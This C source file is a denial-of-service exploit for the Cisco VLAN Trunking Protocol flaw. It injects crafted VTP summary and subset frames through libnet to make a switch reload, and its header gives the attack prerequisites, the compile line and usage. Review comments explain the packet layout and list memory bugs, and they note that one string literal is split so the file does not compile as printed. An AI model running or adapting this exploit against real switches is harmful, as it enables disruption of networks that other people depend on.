/*DoS code for Cisco VLAN Trunking Protocol Vulnerability

 *

 *Vulnerability description:

 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

 *

 *Prerequisites:

 * 1. The switch must be in Server/Client mode.

 * 2. The port the attacker is connected to must be in trunk mode.

 *   Cisco Ethernet ports with no configuration are not

 *   in trunk mode, but trunk mode can be obtained through a DTP

 *   attack by Yersinia.

 * 3. You must know the VTP domain; this can be sniffed.

 * 4. Some of the code is taken from Yersinia.

 *

 *Result:

 * The switch reloads.

 *

 *

 *Compile:

 * gcc -o vtp `libnet-config --libs` vtp.c

 *

 *Usage:vtp -i <interface> -d <vtp_domain>

 *

 *Contact: showrun.lee[AT]gmail.com

 *http://sh0wrun.blogspot.com/

 */

#include <libnet.h>

#include <stdio.h>

#include <stdlib.h>



#define VTP_DOMAIN_SIZE    32

#define VTP_TIMESTAMP_SIZE 12



/*
 * Wire layout of the VTP summary advertisement body.  main() casts this
 * over a calloc'd buffer immediately after the 5-byte SNAP header, so the
 * field order and sizes are the on-the-wire encoding and must not change.
 * There is no packing pragma; the sizes used here happen to leave the
 * u_int32_t members at 4-byte offsets within the struct, so common ABIs add
 * no padding (offset 36 for revision, 40 for updater, 72 bytes total).
 * NOTE(review): the struct itself is placed 5 bytes into the buffer, so
 * the u_int32_t members are not naturally aligned in memory.
 */
struct vtp_summary {
     u_int8_t  version;                      // VTP version; main() sets 1
     u_int8_t  code;                         // message type; 0x01 = summary advert
     u_int8_t  followers;                    // number of subset adverts that follow; main() sets 1
     u_int8_t  dom_len;                      // length of the domain name in bytes
     u_int8_t  domain[VTP_DOMAIN_SIZE];      // domain name, zero-padded (calloc) to 32 bytes
     u_int32_t revision;                     // configuration revision, network byte order
     u_int32_t updater;                      // left zero by main()
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];// left zero by main()
     u_int8_t  md5[16];                      // left zero by main(); no digest is computed
};



/*
 * Wire layout of the VTP subset advertisement header as sent by main().
 * Cast over the packet buffer after the 5-byte SNAP header; field order and
 * sizes are the on-the-wire encoding.  revision lands at struct offset 36,
 * so no padding is inserted on common ABIs (40 bytes total).  main() sends
 * only this header: no VLAN information fields follow it (the memcpy of
 * `aaa` is commented out there).
 */
struct vtp_subset {
     u_int8_t  version;                  // VTP version; main() sets 1
     u_int8_t  code;                     // message type; 0x02 = subset advert
     u_int8_t  seq;                      // sequence number of this subset; main() sets 1
     u_int8_t  dom_len;                  // length of the domain name in bytes
     u_int8_t  domain[VTP_DOMAIN_SIZE];  // domain name, zero-padded (calloc) to 32 bytes
     u_int32_t revision;                 // configuration revision, network byte order
};



/*
 * Print the command-line synopsis for program name s on stdout and
 * terminate the process with exit status 1.  Never returns.
 */
void usage( char *s) {
    fprintf(stdout, "%s -i <interface> -d <vtp domain>\n", s);
    exit(1);
}



int main( int argc, char *argv[] )
{
    /*
     * Entry point.  Parses -i <interface> and -d <vtp domain>, opens a
     * link-layer libnet handle on the interface, then builds and writes two
     * 802.3/LLC/SNAP frames to the Cisco multicast MAC 01:00:0c:cc:cc:cc:
     * first a VTP summary advertisement (code 0x01), then a VTP subset
     * advertisement (code 0x02) carrying no VLAN data.  Both use revision
     * 2000 in network byte order.
     *
     * Returns -1 if libnet_init() or either libnet_write() fails; otherwise
     * execution falls off the end of main (implicit 0 since C99).
     *
     * NOTE(review): defects visible in this function, left unchanged here:
     *  - malloc(strlen(optarg)) is one byte short for the terminator that
     *    strcpy() writes, and neither malloc result is checked.
     *  - `domain` is never initialised when -d is omitted, yet strlen() and
     *    memcpy() are applied to it unconditionally.
     *  - strlen(domain) is not bounded to VTP_DOMAIN_SIZE before the memcpy
     *    into the 32-byte domain[] fields; dom_len truncates to 8 bits.
     *  - libnet_get_hwaddr() may return NULL; mymac is dereferenced unchecked.
     *    The ptags returned into `t` are never checked either.
     *  - Neither packet buffer is freed on the success path, the second
     *    failure path frees vtp_packet rather than vtp_packet2, and
     *    libnet_destroy() is never called.
     *  - `aaa` is unused apart from a commented-out memcpy.
     */
    int opt,k=0;
    extern char *optarg;               // set by getopt(); normally declared via <unistd.h>
    libnet_ptag_t t;                   // protocol tag from libnet_build_*; assigned but never checked
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;         // sent is unsigned; `sent == -1` still works via usual conversions
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    // 5-byte SNAP header placed in front of each VTP body: OUI 00:00:0c
    // (Cisco) followed by protocol id 0x2003 — presumably the VTP PID.
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    // Destination multicast MAC used for Cisco control protocols.
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };   // unused (see commented-out memcpy below)
    struct libnet_ether_addr *mymac;
    char *device;                      // interface name from -i; only valid when k == 1
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;                      // VTP domain from -d; uninitialised if -d is omitted

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          // NOTE(review): allocation is strlen() bytes, one short of what strcpy() writes.
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;                             // remember that an interface was supplied
          break;

          case 'd':
          // NOTE(review): same one-byte-short allocation as for `device`.
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
         
          default: usage(argv[0]);     // usage() calls exit(1) and never returns
          }
     }
     // NOTE(review): the string literal below appears to have been split
     // across two lines by extraction; as printed here it will not compile.
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the 
interface\n",argv[0]);exit(1);}

//init libnet

    // LIBNET_LINK: raw link-layer injection, so the 802.3 header is built by hand below.
    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);   // NOTE(review): may return NULL; not checked before use
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);      // zeroed, so updater/timestamp/md5 and domain padding stay 0
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    // NOTE(review): aux is 5 bytes into the buffer, so the u_int32_t members of
    // the struct are misaligned; tolerated on x86 but undefined behaviour in general.
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;          // one subset advert follows
    vtp_summ->dom_len = strlen(domain);  // NOTE(review): truncates to 8 bits, not bounded to VTP_DOMAIN_SIZE
    memcpy(vtp_summ->domain,domain,strlen(domain));   // NOTE(review): overflows domain[] if strlen(domain) > 32
    vtp_summ->revision = htonl(2000);    // must exceed the switch's current revision number
    // Build inner-to-outer: LLC header with the VTP bytes as payload ...
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    // ... then the 802.3 header whose length field covers LLC + payload.
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);       // drop the built headers before reusing the handle
    
//build the second vtp packet for vtp_subset
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
    
     vtp_sub = (struct vtp_subset *)aux;   // same misalignment caveat as for vtp_summ
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));   // NOTE(review): same unbounded copy as above
     vtp_sub->revision = htonl(2000);     // must exceed the switch's current revision number
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));
    
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);                 // NOTE(review): vtp_packet2 is what this path should release
        return -1;
     }
     libnet_clear_packet(lhandler);
     // NOTE(review): vtp_packet, vtp_packet2, device and domain are leaked here,
     // and libnet_destroy(lhandler) is never called.
}
